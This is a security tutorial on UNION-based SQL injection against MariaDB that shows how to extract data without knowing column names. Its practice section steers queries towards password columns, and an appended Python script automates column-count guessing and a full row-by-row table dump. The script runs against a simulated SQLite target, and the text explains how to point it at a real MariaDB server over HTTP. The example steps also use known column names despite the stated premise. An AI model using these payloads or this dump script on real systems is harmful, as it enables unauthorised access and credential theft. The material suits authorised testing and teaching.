Extract Data Without Columns Name

Context

In this guide, we will explore how to extract data from a MariaDB database using UNION-based SQL injection without knowing the column names of the target table. The technique relies on the numeric placeholders of UNION SELECT, which double as column names that can be referenced later, and it is useful when information_schema cannot be queried (because of privileges or a filter that blocks the name), so the schema cannot simply be looked up. This guide assumes you are familiar with basic SQL queries, database schema concepts, and UNION SELECT statements in the context of MariaDB union-based SQL injection.

Theory

Column Indexing in SQL Queries

SQL does not let a SELECT list refer to columns by position; positional numbers are accepted only in ORDER BY and GROUP BY. What the technique uses instead is a naming rule of UNION: the result columns of a UNION take their names from the expressions of its first SELECT, so in SELECT 1,2,3 UNION SELECT * FROM users the three result columns are named 1, 2 and 3 whatever the real columns of users are called. If that UNION is wrapped in a derived table (a subquery in FROM with an alias), the outer query can read any position by its number, written in backticks (MariaDB's identifier quoting, for example the third column as `3`). That is how data is pulled from a table whose column names are unknown, which is the situation in restrictive injection scenarios where information_schema is not accessible.

Blind Select Techniques

Blind Select is a technique used to extract data from a database when the schema, including column names, is not visible. Instead of names, the attacker works with UNION SELECT and numeric placeholders: a series of trial queries establishes how many columns the target table has, and each placeholder position is then read in turn to uncover its contents.

Offset Guessing in SQL Injection

Offset guessing is the iterative part of the method: the number of placeholders in UNION SELECT is raised one at a time until the server stops rejecting the column count, and the placeholder at each position is then swapped out to see which positions carry data back to the attacker. Each step is a small change to the previous query, so keeping the SQL syntax exact and noting what has already been tried matters more than cleverness.

Practice

Extract Data Using UNION SELECT Without Column Names

To exploit a database using UNION-based SQL injection without knowing the column names, follow these steps. Each query is written out in full, as the server executes it, with numeric placeholders standing in for the columns whose names are unknown.

  • Initial Column Count Test

    • Perform an initial test to determine the number of columns in the table.
    SELECT 1,2,3 FROM users WHERE id=1 UNION SELECT 1,2,3 FROM users;
    

    A UNION is only accepted when both SELECT lists have the same number of columns; on a mismatch MariaDB answers "The used SELECT statements have a different number of columns". Add or remove placeholders until the query runs without that error: the count that works is the number of columns in the table.

  • Blind Column Index Replacement

    • Replace one placeholder with a column you can reach by name, such as username, to find out which positions are rendered.
    SELECT 1,username,3 FROM users WHERE id=1 UNION SELECT 1,2,3 FROM users;
    

    Whatever is placed at a position in the SELECT list comes back at that same position in the result, so the positions whose values the application displays (or echoes in an error message) are the ones that can carry data out. Try each position in turn if the first one is not displayed.

  • Sensitive Data Extraction

    • Continue replacing placeholders to steer the query towards sensitive data such as passwords.
    SELECT 1,2,password FROM users WHERE id=1 UNION SELECT 1,2,3 FROM users;
    

    Repeat for each displayed position and each column of interest until everything needed has been read. When the column names themselves are unknown, keep the numeric placeholders in the first SELECT of the UNION, wrap the UNION in a derived table, and select each position by its number in backticks instead of by name.

Through this methodology you read user data out of the database without having known any column names at the outset.
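The three steps above, driven end to end from a script, as an added example that is not part of the original page. The payloads are written in MariaDB syntax (placeholder row in the first SELECT, derived table with an alias, backtick-quoted column numbers, LIMIT ... OFFSET), but they are executed here against an in-memory SQLite database, which is assumed to share the two properties the technique depends on: a UNION whose sides have different column counts fails when the statement is parsed, and the result columns of a UNION are named after the expressions of the first SELECT. The users table, its rows and the vulnerable query template are constructed for the demo. The example goes beyond the page's steps in two ways: it reads columns purely by number, without ever naming username or password, and it walks the rows one at a time with LIMIT and OFFSET.

```python
"""Added example (not from the original page): UNION-based extraction of a
table whose column names are unknown, simulated against SQLite with
MariaDB-style payloads.  Table, rows and the vulnerable query are constructed."""
import itertools
import sqlite3

MISSING = object()  # "no row at this offset", distinct from a NULL cell


def setup_db():
    """Constructed target: a table whose column names the attacker does not know."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice', 's3cret'), (2, 'bob', 'hunter2');
        """
    )
    return conn


def vulnerable_query(conn, user_input):
    """Constructed vulnerable application: user input is concatenated into WHERE."""
    sql = f"SELECT id, username, password FROM users WHERE id={user_input}"
    return conn.execute(sql).fetchall()


def placeholders(n):
    """'1,2,...,n': the numeric stand-ins that also become the column names."""
    return ",".join(str(i) for i in range(1, n + 1))


def guess_column_count(conn, max_cols=20):
    """Step 1: grow UNION SELECT 1,2,... until the counts match and no error is raised."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_query(conn, f"0 UNION SELECT {placeholders(n)}")
            return n
        except sqlite3.OperationalError:  # column-count mismatch, keep going
            continue
    return None


def guess_target_column_count(conn, app_cols, table, max_cols=20):
    """Step 1 again, one level down: the placeholder row inside the derived
    table must have exactly as many columns as SELECT * FROM table."""
    for k in range(1, max_cols + 1):
        payload = (f"0 UNION SELECT {placeholders(app_cols)} "
                   f"FROM (SELECT {placeholders(k)} UNION ALL SELECT * FROM {table})x")
        try:
            vulnerable_query(conn, payload)
            return k
        except sqlite3.OperationalError:
            continue
    return None


def extract_cell(conn, app_cols, table, table_cols, col_index, row_offset, visible_pos=2):
    """Steps 2-3: read column number col_index of one row without knowing its name.

    Inside the derived table the placeholder row names the columns 1..table_cols,
    so the backtick-quoted number selects that position of SELECT *.  The value
    is put at visible_pos of the outer UNION, the position the application
    renders.  UNION ALL keeps the inner rows in order: OFFSET 0 is the
    placeholder row, real rows start at OFFSET 1.
    """
    outer = ",".join(f"`{col_index}`" if i == visible_pos else str(i)
                     for i in range(1, app_cols + 1))
    payload = (f"0 UNION SELECT {outer} FROM (SELECT {placeholders(table_cols)} "
               f"UNION ALL SELECT * FROM {table} LIMIT 1 OFFSET {row_offset})x")
    rows = vulnerable_query(conn, payload)
    return rows[0][visible_pos - 1] if rows else MISSING


def dump_table(conn, table):
    """Drive the whole procedure and return the table's rows as tuples."""
    app_cols = guess_column_count(conn)
    table_cols = guess_target_column_count(conn, app_cols, table)
    rows = []
    for offset in itertools.count(1):
        cells = [extract_cell(conn, app_cols, table, table_cols, c, offset)
                 for c in range(1, table_cols + 1)]
        if cells[0] is MISSING:  # the offset walked past the last row
            return rows
        rows.append(tuple(cells))


if __name__ == "__main__":
    db = setup_db()
    for row in dump_table(db, "users"):
        print(row)
```

Against a real MariaDB target only vulnerable_query changes: it becomes the HTTP request carrying user_input, and "did the server error" becomes whatever the application shows on a failed query. The 0 in front of UNION keeps the application's own row out of the way so that the single injected row is the one rendered.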

Tools

  • sqlmap
  • Burp Suite

The tools mentioned can automate some of the steps (sqlmap's UNION technique performs the column-count search itself; Burp Suite's Repeater and Intruder send and compare the iterations) and help analyze the responses so the column guessing is refined quickly.
